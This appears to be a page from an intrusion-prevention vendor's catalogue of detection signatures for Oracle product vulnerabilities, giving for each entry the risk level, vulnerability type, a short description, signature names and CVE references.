Situation:	HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow HTTP_SS-Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow File-Text_Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-BOF-Exploit

Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Document Capture

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle Document Capture; Oracle Imaging and Process Management; Oracle Universal Content Management

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Oracle Document Capture, which is integrated with Oracle Imaging and Process Management and Oracle Universal Content Management products. The vulnerability is due to a boundary error that can occur when parsing a crafted argument passed to the AddAttachment method of the EasyMail SMTP ActiveX component. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could lead to arbitrary code execution on the target system.

Situation:

HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-SMTP-Addattachment-Buffer-Overflow

References:

BID-36440
http://www.securityfocus.com/bid/36440

Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Document Capture

Risk:

High

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle Document Capture

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Oracle Document Capture.

Situation:

HTTP_SS-Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow
File-Text_Oracle-Document-Capture-EasyMail-SMTP-SubmitToExpress-Buffer-Overflow

References:

CVE-2007-4607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4607

BID-25467
http://www.securityfocus.com/bid/25467

OSVDB-38335
http://www.osvdb.org/38335

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1255-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

Multiple cross-site scripting vulnerabilities have been reported in the Calendar module of the Advanced Outbound Telephony component in Oracle E-Business Suite. The vulnerability is due to use of untrusted user input from requests when constructing Javascript in a JSP. A remote attacker can exploit this vulnerability by enticing a target user into clicking on a crafted link. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-Calendar-XSS

References:

CVE-2020-2852
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2852

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

A cross-site scripting vulnerability has been reported in the User Interface of the Advanced Outbound Telephony component in Oracle E-Business Suite. The vulnerability is due to use of untrusted user input from requests when constructing HTML output in a JSP. A remote attacker can exploit this vulnerability by enticing a target user into clicking on a crafted link. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2854-XSS

References:

CVE-2020-2854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2854

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-XSS

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

Improper handling of user input causes a cross-site scripting vulnerability in Oracle E-Business Suite. A successful exploit may allow an attacker to run arbitrary scripts in a user's browser.

Situation:

HTTP_CSU-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2856-Cross-Site-Scripting

References:

CVE-2020-2856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2856

Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1258-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Advanced-Outbound-Telephony-CVE-2020-2871-XSS

References:

CVE-2020-2871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2871

Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1555-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in the Upload component of the Web Applications Desktop Integrator application of Oracle E-Business Suite. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation results in the execution of arbitrary code in the security context of the service.

Situation:

File-TextId_Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587

References:

CVE-2022-21587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21587

Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

SQL Injection

Description:

A SQL injection vulnerability exists in the Oracle Customer Intellect component of the Oracle E-Business Suite.

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Biccfgd2.jsp-SQL-Injection-CVE-2016-0545

References:

CVE-2016-0545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0545

Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported in the Common Applications Calendar component in Oracle E-Business Suite. The vulnerability is due to the use of untrusted user input from requests when constructing HTML output in a JSP. A remote attacker can exploit this vulnerability by enticing a target user into clicking on a crafted link. Successful exploitation could result in the execution of script code in security context of the target user's browser.

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Common-Applications-Calendar-CVE-2021-2114-XSS

References:

CVE-2021-2114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2114

Oracle-E-Business-Suite-Desktop-Integrator-Bnedecoder-Dir-Traversal

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1557-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Directory Traversal

Description:

Improper validation of data input causes a directory traversal vulnerability in Oracle E-Business Suite. A successful exploit may allow an attacker to execute remote code on the target system.

Situation:

HTTP_CS-Oracle-E-Business-Suite-Web-Applications-Desktop-Integrator-Bnedecoder-Directory-Traversal

References:

CVE-2022-39428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39428

Oracle-E-Business-Suite-General-Ledger-SQL-Injection

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1213-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Malfunction

Description:

Insufficient access controls and improper sanitization of user input cause an SQL injection vulnerability in the Oracle E-Business Suite. A successful attack allows an attacker to execute arbitrary SQL on the target.

Situation:

HTTP_CS-Oracle-E-Business-Suite-General-Ledger-SQL-Injection

References:

CVE-2019-2638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2638

Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1243-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

The Position Hierarchy Viewer module of the Human Resources component in Oracle E-Business Suite does not correctly validate inputs, which causes an SQL injection vulnerability that can be exploited to be able to execute arbitrary SQL with the privileges of the database user.

Situation:

File-MPEG_Oracle-E-Business-Suite-Human-Resources-CVE-2020-2956-SQL-Injection

References:

CVE-2020-2956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2956

Oracle-E-Business-Suite-Human-Resources-SQL-Injection

About this vulnerability:

A vulnerability in Oracle E-Business Suite Human Resources

Risk:

High

First detected in:

sgpkg-ips-1224-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

SQL Injection

Description:

There exists a vulnerability in the Human Resources module in Oracle E-Business Suite, versions 12.1.1-12.1.3 and 12.2.3-12.2.9, which allows remote attackers to execute arbitrary SQL commands due to insufficient access control.

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Human-Resources-SQL-Injection

References:

CVE-2020-2587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2587

Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1346-5242

Last changed:

sgpkg-ips-1346-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

There exists a reflected cross-site scripting vulnerability in the iStore component in Oracle E-Business Suite. Successful exploitation could lead in the execution of javascript code in the target user's browser.

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Istore-Personal-Information-Cross-Site-Scripting

References:

CVE-2021-2182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2182

Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1373-5242

Last changed:

sgpkg-ips-1373-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

Improper handling of user input causes a stored cross-site scripting vulnerability in Oracle E-Business Suite Knowledge Management. A successful exploit allows an attacker to execute arbitrary code in a user's browser.

Situation:

HTTP_CRL-Oracle-E-Business-Suite-Knowledge-Management-Stored-Cross-Site-Scripting

References:

CVE-2021-2198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2198

Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

Moderate

First detected in:

sgpkg-ips-1363-5242

Last changed:

sgpkg-ips-1363-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Infinite Loop

Description:

There exists an infinite loop vulnerability in the Sales Offline component of Oracle E-Business Suite. Successful exploitation could lead in denial of service conditions.

Situation:

HTTP_CSU-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2189-Infinite-Loop

References:

CVE-2021-2189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2189

Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Infinite Loop

Description:

An infinite loop vulnerability has been reported in the Sales Offline component of Oracle E-Business Suite. The vulnerability is due to improper handling of requests by the authentication component of Sales Offline. An unauthenticated, remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation causes an infinite loop, consuming large amounts of CPU resources and possibly leading to denial of service conditions on the target server.

Situation:

HTTP_CS-Oracle-E-Business-Suite-Sales-Offline-CVE-2021-2190-Infinite-Loop

References:

CVE-2021-2190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2190

Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1697-5242

Last changed:

sgpkg-ips-1697-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

An SQL execution vulnerability has been reported in the Human Resources component of Oracle E-Business Suite. Successful exploitation results in the execution of arbitrary SQL statements with the privileges of the APPS database user.

Situation:

HTTP_CS-Oracle-E-Business-Suite-SQL-Injection-CVE-2020-2882

References:

CVE-2020-2882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2882

Oracle-E-Business-Suite-Work-In-Process-SQL-Injection

About this vulnerability:

A vulnerability in Oracle E-Business Suite

Risk:

High

First detected in:

sgpkg-ips-1240-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle E-Business Suite

Type:

Input Validation

Description:

An SQL execution vulnerability has been reported in the Work In Process component of Oracle E-Business Suite. The vulnerability is due to a combination of insufficient access controls and using untrusted user input from serialized Java objects to build a SQL query string. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary SQL statements with the privileges of the APPS database user.

Situation:

File-Binary_Oracle-E-Business-Suite-Work-In-Process-SQL-Injection

References:

CVE-2019-2633
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2633

Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Endeca Server

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in Oracle Endeca Information Discovery Integrator ETL Server. A successful exploitation can lead to arbitrary code execution.

Situation:

HTTP_CS-Oracle-Endeca-Idi-Etl-Server-Uploadfilecontent-Directory-Traversal

References:

CVE-2015-2602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2602

Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server

Risk:

Moderate

First detected in:

sgpkg-ips-674-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Endeca Server

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Oracle Endeca Information Discovery Integrator ETL Server. The vulnerability is due to insufficient input validation while processing SOAP requests to the RenameFile operation. By sending crafted SOAP requests to the target system, a remote authenticated attacker can leverage this vulnerability to rename and move arbitrary files on a target system with System privileges. This can further lead to information disclosure and eventually arbitrary code execution.

Situation:

HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Directory-Traversal

References:

CVE-2015-2606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2606

Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability

About this vulnerability:

A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server

Risk:

Moderate

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Endeca Server

Type:

Directory Traversal

Description:

A directory traversal vulnerability exists in Oracle Endeca Information Discovery Integrator ETL Server. The vulnerability is due to insufficient input validation while processing SOAP requests to the MoveFile operation. By sending crafted SOAP requests to the target system, a remote authenticated attacker can leverage this vulnerability to move arbitrary files on a target system with System privileges. This can further lead to information disclosure and eventually arbitrary code execution.

Situation:

HTTP_CS-Oracle-Endeca-Information-Discovery-Integrator-Etl-Server-Movefile-Vulnerability

References:

CVE-2015-2605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2605

Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution

About this vulnerability:

A vulnerability in Oracle Endeca Server

Risk:

High

First detected in:

sgpkg-ips-541-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle Endeca Server

Type:

Malfunction

Description:

A command execution vulnerability exists in Oracle Endeca Server. The vulnerability is due to the controlSoapBinding web service exposing the createDataStore method which contains a flaw that allows for the injection of arbitrary commands. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted request to the affected server. Successful exploitation could result in arbitrary command execution with elevated privileges.

Situation:

HTTP_CS-Oracle-Endeca-Server-Createdatastore-Remote-Command-Execution

References:

CVE-2013-3763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3763

OSVDB-95269
http://www.osvdb.org/95269

Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604

About this vulnerability:

A vulnerability in Oracle Endeca Information Discovery Integrator ETL Server

Risk:

Low

First detected in:

sgpkg-ips-676-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Endeca Server

Type:

Directory Traversal

Description:

There is a directory traversal vulnerability in Oracle Endeca Information Discovery Integrator ETL Server which can be exploited by sending a malicious SOAP request.

Situation:

HTTP_CS-Oracle-Endeca-Server-Directory-Traversal-CVE-2015-2604

References:

CVE-2015-2604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2604

Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Oracle Event Processing

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle Event Processing

Type:

Directory Traversal

Description:

A code execution vulnerability exists in Oracle Event Processing. The vulnerability is due to a directory traversal within the FileUploadServlet servlet. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request. This may lead to code execution in the context of the affected service.

Situation:

HTTP_CS-Oracle-Event-Processing-Fileuploadservlet-Directory-Traversal

References:

CVE-2014-2424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2424

BID-66871
http://www.securityfocus.com/bid/66871

OSVDB-105844
http://www.osvdb.org/105844

Oracle-Fusion-Middleware-Information-Disclosure

About this vulnerability:

An information disclosure vulnerability in Oracle Fusion Middleware.

Risk:

High

First detected in:

sgpkg-ips-660-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Oracle Fusion Middleware

Type:

Insecure Configuration

Description:

A vulnerability in Oracle Fusion Middleware, in the Oracle Reports Developer 'Report Server' component, versions 11.1.1.4, 11.1.1.6, and 11.1.2.0, that allow remote attackers access to sensitive information about the server. This can be used in conjuntion with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.

Situation:

HTTP_CSU-Oracle-Fusion-Middleware-Information-Disclosure

References:

CVE-2012-3152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3152

BID-55955
http://www.securityfocus.com/bid/55955

OSVDB-86395
http://www.osvdb.org/86395

Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-DirTrav

About this vulnerability:

A vulnerability in Oracle Fusion Middleware MapViewer

Risk:

Moderate

First detected in:

sgpkg-ips-895-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Fusion Middleware

Type:

Directory Traversal

Description:

Improper input validation causes a directory traversal vulnerability in Oracle Fusion Middleware MapViewer. A successful exploit allows an attacker to upload and execute arbitrary code with the privileges of the server process.

Situation:

HTTP_CS-Oracle-Fusion-Middleware-Mapviewer-Fileuploaderservlet-Filename-Directory-Traversal

References:

CVE-2017-3230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3230

Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow

About this vulnerability:	A vulnerability in Oracle Outside In Technology
Risk:	High
First detected in:	sgpkg-ips-474-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Outside In Technology
Type:	Integer Overflow
Description:	There is an integer overflow vulnerability in Oracle Outside In. The vulnerability is due to improper parsing of Excel files. When handling TxO records the code improperly wraps an integer value. This will result in an integer overflow causing a heap-based buffer overflow. A remote unauthenticated attacker can exploit this vulnerability by causing an application that uses the vulnerable library to handle a malformed Excel file. Depending on the application, user interaction may be required. Successful exploitation can result in arbitrary code execution in the context of the affected application.
Situation:	File-OLE_Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow

Oracle-Fusion-Middleware-Remote-Code-Execution

About this vulnerability:

A remote code execution vulnerability in Oracle Fusion Middleware.

Risk:

High

First detected in:

sgpkg-ips-660-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Oracle Fusion Middleware

Type:

Insecure Configuration

Description:

A vulnerability in Oracle Fusion Middleware, in the Oracle Reports Developer 'Servlet' component, versions 11.1.1.4, 11.1.1.6, and 11.1.2.0, that allow remote attackers to execute arbitrary code by uploading a .jsp file.

Situation:

HTTP_CRL-Oracle-Fusion-Middleware-Remote-Code-Execution

References:

CVE-2012-3153
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3153

BID-55961
http://www.securityfocus.com/bid/55961

OSVDB-86394
http://www.osvdb.org/86394

Oracle-GlassFish-Server-Malformed-Username-Cross-Site-Scripting

About this vulnerability:

An attempt to exploit vulnerability in Oracle GlassFish Server detected

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Oracle GlassFish Server

Type:

Malfunction

Description:

A persistent cross site scripting vulnerability has been reported in the HTTP administration component of Oracle's GlassFish Server. The vulnerability is due to insufficient input validation on incorrect username values, which are then written to a log file.

References:

CVE-2011-2260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2260

OSVDB-73972
http://www.osvdb.org/73972

Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities

About this vulnerability:

A vulnerability in Oracle Sun GlassFish Enterprise Server

Risk:

High

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Oracle GlassFish Server

Type:

Cross-site Scripting

Description:

Multiple reflected cross site scripting vulnerabilities have been reported in Oracle GlassFish. The vulnerabilities are due to unsanitized parameters in various web pages in the Web Container component. A remote attacker can exploit these vulnerabilities by enticing an unauthenticated user to follow a specially crafted URL. Successful exploitation could result in attacker-controlled script code being executed in the browser context of the GlassFish Server.

Situation:

HTTP_CS-Oracle-GlassFish-Server-Multiple-Reflected-XSS-Vulnerabilities

References:

CVE-2012-0551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0551

OSVDB-81226
http://www.osvdb.org/81226

Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities

About this vulnerability:

A vulnerability in Oracle Sun GlassFish Enterprise Server

Risk:

Low

First detected in:

sgpkg-ips-451-4333

Last changed:

sgpkg-ips-1349-5242

Platform:

Generic

Software:

Oracle GlassFish Server

Type:

Input Validation

Description:

Multiple cross site scripting vulnerabilities have been reported in Oracle GlassFish. The vulnerabilities are due to unsanitized parameters in various web pages in the Web Container component. A remote, unauthenticated attacker can exploit these vulnerabilities by enticing a user to follow a specially crafted URL. Successful exploitation could result in attacker controlled script code executing in the browser context for the GlassFish Server.

Situation:

HTTP_CRL-Oracle-GlassFish-Server-Multiple-Stored-XSS-Vulnerabilities

References:

CVE-2012-0551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0551

OSVDB-81227
http://www.osvdb.org/81227

Oracle-GlassFish-Server-Themeservlet-Directory-Traversal

About this vulnerability:	A vulnerability in Oracle GlassFish Server
Risk:	Moderate
First detected in:	sgpkg-ips-737-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle GlassFish Server
Type:	Directory Traversal
Description:	The Oracle GlassFish Server has insufficient validation of certain requests, due to which a vulnerability allowing arbitrary file download can be exploited.
Situation:	HTTP_CSU-Oracle-GlassFish-Server-Themeservlet-Directory-Traversal

Oracle-GoldenGate-Manager-Command-Report-DoS

About this vulnerability:

A vulnerability in Oracle GoldenGate Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle GoldenGate Manager

Type:

Input Validation

Description:

A vulnerability in Oracle GoldenGate Manager, versions 12.1.2.1.0, 12.2.0.2.0, and 12.3.0.1.0, which allows remote attcakers to cause a denial of service condition by sending a malformated command, due to improper handling of an incomplete REPORT command.

Situation:

Generic_CS-Oracle-GoldenGate-Manager-Command-Report-DoS

References:

CVE-2018-2914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2914

Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle GoldenGate Manager

Risk:

High

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle GoldenGate Manager

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability in Oracle GoldenGate Manager, versions 12.1.2.1.0, 12.2.0.2.0, and 12.3.0.1.0, which allows remote attcakers to execute arbitrary code, due to an input validation error when processing an overly long command name.

Situation:

Generic_CS-Oracle-GoldenGate-Manager-Command-Stack-Buffer-Overflow

References:

CVE-2018-2913
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2913

Oracle-GoldenGate-Manager-Tab-Parsing-DoS

About this vulnerability:

A vulnerability in Oracle GoldenGate Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1138-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle GoldenGate Manager

Type:

Input Validation

Description:

A vulnerability in Oracle GoldenGate Manager, versions 12.1.2.1.0, 12.2.0.2.0, and 12.3.0.1.0, which allows remote attcakers to cause a denial of service condition by sending a malformated command which is not correctly separated by TAB characters.

Situation:

Generic_CS-Oracle-GoldenGate-Manager-Tab-Parsing-DoS

References:

CVE-2018-2912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2912

Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle GoldenGate Veridata

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle GoldenGate Veridata

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Oracle GoldenGate Veridata Server. The vulnerability is due to a boundary error while parsing XML SOAP requests containing an overly long tag string. Remote unauthenticated attackers could exploit this vulnerability by sending a crafted SOAP request to the target server. Successful exploitation would result in arbitrary code execution with SYSTEM privileges.

Situation:

File-TextId_Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow

References:

CVE-2010-4416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4416

BID-45868
http://www.securityfocus.com/bid/45868

Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636

About this vulnerability:

An attempt to exploit a vulnerability in Oracle Hospitality detected

Risk:

High

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

Oracle Hospitality

Type:

Input Validation

Description:

A vulnerability in the Oracle Hospitality Simphony component of the Oracle Hospitality applications allows unauthenticated attackers with network access via HTTP to compromise Oracle Hospitality Simphony. Successful attacks of this vulnerability could allow reading sensitive data and receiving information about various services without any authentication.

Situation:

HTTP_CRL-Oracle-Hospitality-Simphony-Directory-Traversal-CVE-2018-2636

References:

CVE-2018-2636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2636

Oracle-HTTP-Server-Mod-Access-Restriction-Bypass

About this vulnerability:

Access restriction bypass vulnerability in Oracle HTTP Server

Risk:

Moderate

First detected in:

sgpkg-ips-68-1314

Last changed:

sgpkg-ips-1784-5242

Platform:

Generic

Software:

Oracle Application Server

Type:

Malfunction

Description:

There is an access restriction bypass vulnerability in Oracle HTTP Server. By exploiting this vulnerability successfully, a remote attacker can gain an access to the restricted content of the target server. This vulnerability is exploitable when the UseWebcacheIP configuration directive is disabled on the target machine.

Situation:

HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass
HTTP_CSU-Oracle-HTTP-Server-Mod-Access-Restriction-Bypass-2
HTTP_CSU-Oracle-Potential-Vulnerability-Probe-Request

References:

CVE-2005-1383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1383

BID-13418
http://www.securityfocus.com/bid/13418

OSVDB-15908
http://www.osvdb.org/15908

Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Hyperion Strategic Finance Client

Risk:

Moderate

First detected in:

sgpkg-ips-425-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Hyperion Strategic Finance Client

Type:

Buffer Overflow

Description:

There is a heap buffer overflow in Oracle Hyperion Strategic Finance Client. The vulnerability is due to a boundary error in the SetDevNames() method of the Tidestone Formula One WorkBook TTF16.ocx ActiveX control. This can be exploited to inject and execute arbitrary code in the context of the currently logged-on user. A remote attacker could exploit this vulnerability to achieve arbitrary code execution by enticing a target user to open a crafted web page.

Situation:

File-Text_Oracle-Hyperion-Strategic-Finance-Client-TTF16-Heap-Buffer-Overflow

References:

OSVDB-76913
